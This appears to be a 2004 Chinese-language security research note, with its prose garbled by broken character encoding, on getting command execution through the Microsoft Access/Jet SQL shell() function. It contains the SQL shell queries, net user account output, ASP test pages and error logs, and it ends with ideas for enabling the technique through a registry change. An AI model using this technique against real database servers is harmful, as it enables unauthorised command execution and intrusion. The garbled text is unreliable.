�������ߣ�SuperHei
�������ʣ�ԭ��
�������ڣ�2004-09-16
��������accessl��ֱ��sql��ѯ:
SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:123456.txt');
�����С��õ�����:
C:>dir 123456.txt
������ C �еľ�û�б�ǩ��
��������� 3CEE-A8A9
C: ��Ŀ¼
2004-01-09 22:29 1,718 123456.txt
1 ���ļ� 1,718 �ֽ�
0 ��Ŀ¼ 1,224,527,872 �����ֽ�
C:>type 123456.txt
������ C �еľ�û�б�ǩ��
��������� 3CEE-A8A9
c: ��Ŀ¼
2004-01-07 15:35 44 1.txt
2004-07-15 05:15 49 11.txt
2004-01-09 22:29 0 123456.txt
2004-07-31 15:50 478 333.txt
�ɹ�ִ��,���ǿ���Ȩ�ޣ�������Ϊ:
SELECT shell('c:winntsystem32cmd.exe /c dir c: >c:3456.txt');
���к�:
C:>net user
KAK-E8UHOQQ9M6S ���û��ʻ�
----------------------------------------------
aa Administrator
IUSR_KAK-E8UHOQQ9M6S IWAM_KAK-E8UHOQQ9M6S
�����ɹ����ɡ�
����Ȩ�ޱȽϴ�(���������Ǽ̳�������access���û���Ȩ��,���õ��ǹ���ԱȨ�����е�,��guest��û�в���)
�������Dz���sp��ִ��,�����Լ�д��asp,��������:
< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "select shell('c:winntsystem32cmd.exe /c dir c: > d:sss1.txt')"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'�ر�����
conn.close
set conn=nothing
response.write "sql��" &sql
%>
��������asp,���ؽ�������:
Microsoft VBScript ���������� ���� '800a03f6'
ȱ�� 'End'
/iisHelp/common/500-100.asp����242
Microsoft JET Database Engine ���� '80040e14'
����ʽ�� 'shell' ����δ���塣
/test/lse/Connections/kaoo6.asp����7
��ʾ�� 'shell' ����δ���塱,����ʧ��,�Ұ�asp��������
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
��Ϊ dsn="Provider=Microsoft.Jet.OLEDB.3.5;Data Source="&Server.MapPath("q.mdb")
����ie����:
Microsoft VBScript ���������� ���� '800a03f6'
ȱ�� 'End'
/iisHelp/common/500-100.asp����242
ADODB.Connection ���� '800a0e7a'
Provider cannot be found. It may not be properly installed.
/test/lse/Connections/kaoo8.asp����5
Providerû�а�װ û�м�������.
2.���ڱ����IJ���
����ʹ��MsysObjecs : �����½�������ѯ,��������:
SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate, SysObjects.Name, ysObjects.Type ROM MSysObjects;
MSysObjects.DateCreate �õ�����ʱ��
MSysObjects.DateUpdate ����ʱ��
MSysObjects.Name ���ݿ�����
MSysObjects.Type ���ݿ�����
����ִ������������,ֱ�ӵõ�����:
���Ƿŵ�asp��:
< %
Set Conn = Server.CreateObject("ADODB.Connection")
dsn="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("q.mdb")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT MSysObjects.DateCreate, MSysObjects.DateUpdate,MSysObjects.Name,MSysObjects.Type FROM MSysObjects;"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
rs.close
set rs=nothing
'�ر�����
conn.close
set conn=nothing
response.write "sql��" &sql
%>
ie����:
Microsoft VBScript ���������� ���� '800a03f6'
ȱ�� 'End'
/iisHelp/common/500-100.asp����242
Microsoft JET Database Engine ���� '80040e09'
���ܶ�ȡ��¼���� 'MSysObjects' ��û�ж�ȡ����Ȩ�ޡ�
/test/lse/Connections/kaoo7.asp����7
��ʾ ���ܶ�ȡ��¼���� 'MSysObjects' ��û�ж�ȡ����Ȩ�ޡ� û�취��,�����취��ز����.
3.����:
��iis5(Microsoft.Jet.OLEDB.4.0)���Dz�����ֱ��ִ��shell(��˵��Jet 3.5 Ҳ������iis4��ʱ������),��Jet.OLEDB.4.0Ĭ�ϵ������²�����,���ǿ�������,���ǿ���ͨ����ע��������ʵ��,�����IJ�֪��.
����˼·:
1,���������ĸ�ע����,��Jet.OLEDB.4.0֧��shell �������ǿ�����asp��ֱ������.
2.����ͨ����������,ֱ�Ӷ�mdb�ļ�����,����select shell()ִ��ϵͳ����.